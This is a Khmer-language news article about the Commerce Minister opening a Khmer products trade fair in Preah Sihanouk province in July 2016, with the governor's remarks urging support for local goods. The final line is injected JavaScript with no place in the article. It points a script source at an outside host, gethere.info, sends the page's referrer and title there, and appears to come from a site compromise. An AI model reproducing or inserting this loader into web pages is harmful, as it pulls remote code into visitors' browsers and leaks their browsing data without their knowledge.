ឯកឧត្តម ប៉ាន់ សូរស័ក្ក អញ្ជើញចូលរួមពិធីបើក សម្ភោធពិព័រណ៍ពាណិជ្ជកម្មផលិតផលខ្មែរ ក្នុងឱកាសយុទ្ធនាការទិញផលិតផលខ្មែរ
ភ្នំពេញ៖ នារសៀលថ្ងៃទី២៨ ខែកក្កដា ឆ្នាំ២០១៦ ឯកឧត្តម ប៉ាន់ សូរស័ក្ក រដ្ឋមន្រ្តីក្រសួងពាណិជ្ជកម្ម អមដំណើរដោយ ឯកឧត្តម ជាម ហុីម ប្រធានក្រុមប្រឹក្សាខេត្តព្រះសីហនុ ឯកឧត្តម យន្ត មីន អភិបាល នៃគណៈអភិបាលខេត្តព្រះសីហនុ ឯកឧត្តម ឈួន ដារ៉ា រដ្ឋលេខាធិការក្រសួងពាណិជ្ជកម្ម បានអញ្ជើញចូលរួមពិធីបើក សម្ភោធពិព័រណ៍ពាណិជ្ជកម្មផលិតផលខ្មែរ ក្នុងឱកាសយុទ្ធនាការទិញផលិតផលខ្មែរ ដែលប្រារព្ធធ្វើឡើងនៅឆ្នេរអូរឈើទាល ខេត្តព្រះសីហនុ។
ក្នុងឱកាសបើកសម្ពោធនេះផងដែរ ឯកឧត្តម យន្ត មីន អភិបាល នៃគណៈអភិបាលខេត្តព្រះសីហនុ ក៏បានសំដែងនូវការអបអរសាទរ និងកោតសរសើរចំពោះការរៀបចំឲ្យមាននូវការតាំងបង្ហាញផលិតផលខ្មែរ ក្នុងឱកាសយុទ្ធនាការទិញផលិតផលខ្មែរ របស់ក្រសួងពាណិជ្ជកម្ម មន្ទីរពាណិជ្ជកម្មគ្រប់ខេត្ត ក្រុង ផលិតករ ពាណិជ្ជករ និងភាគីពាក់ព័ន្ធនានា ដែលជំរុញឲ្យមានព្រឹត្តការណ៍នេះកើតឡើង ជាពិសេសដែលបានជ្រើសរើសយកខេត្តព្រះសីហនុដែលជាខេត្តគោលដៅទី៣។
ឯកឧត្តមក៏បានជម្រាបដល់ប្រជាពលរដ្ឋពីវិស័យសំខាន់ៗ ព្រមទាំងកំណើនភ្ញៀវទេសចរ និងភាពរីកចម្រើននានាក្នុងខេត្តព្រះសីហនុផងដែរ និងស្នើដល់បងប្អូនជាម្ចាស់អាជីវករ កសិដ្ឋាន កសិករ អ្នកផ្គត់ផ្គង ព្រមទាំងដៃគូរពាក់ព័ន្ធទាំងអស់ដែលបានចូលរួមក្នុងពិធីនេះ សូមឲ្យប្រើប្រាស់ឲ្យអស់លទ្ធភាព និងសមត្ថភាពដែលខ្លួនមានក្នុងការផ្លាស់ប្តូរបទពិសោធន៏គ្នាទៅវិញទៅមកក្នុងការផលិត ការផ្តល់ព័ត៌មានជូនទៅដល់អ្នកទស្សនាទាំងអស់ និងស្វែងរកអតិថិជន សំរាប់ការលក់ផលិតផលរបស់ខ្លួន។
លើសពីនេះទៅទៀតឯកឧត្តមក៏ស្នើឲ្យប្រជាពលរដ្ឋ និងអ្នកដែលបានមកទស្សនាទាំងអស់ចូលរួមគាំទ្រផលិតផលកម្ពុជាដើម្បីអភិវឌ្ឍន៍សេដ្ឋកិច្ចជាតិ និងដើម្បីកាត់បន្ថយភាពក្រីក្រនៅកម្ពុជា។ គួរបញ្ជាក់ផងដែរថាពិព័រណ៍ពាណិជ្ជកម្មផលិតផលខ្មែរ ក្នុងឱកាសយុទ្ធនាការទិញផលិតផលខ្មែរប្រារព្ធធ្វើឡើងចាប់ពីថ្ងៃទី២៨ ខែកក្កដា ឆ្នាំ២០១៦ រហូតដល់ ថ្ងៃទី៣១ ខែកក្កដា ឆ្នាំ២០១៦ នៅឆ្នេរអូរឈើទាល ខេត្តព្រះសីហនុ ក្នុងឱកាសតាំងពិព័រណ៍នេះក៏មានការប្រគុំតន្ត្រី និងសិល្បះជូនបងប្អូនប្រជាពលរដ្ឋទស្សនាផងដែរ។ សម្បត្តិ
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;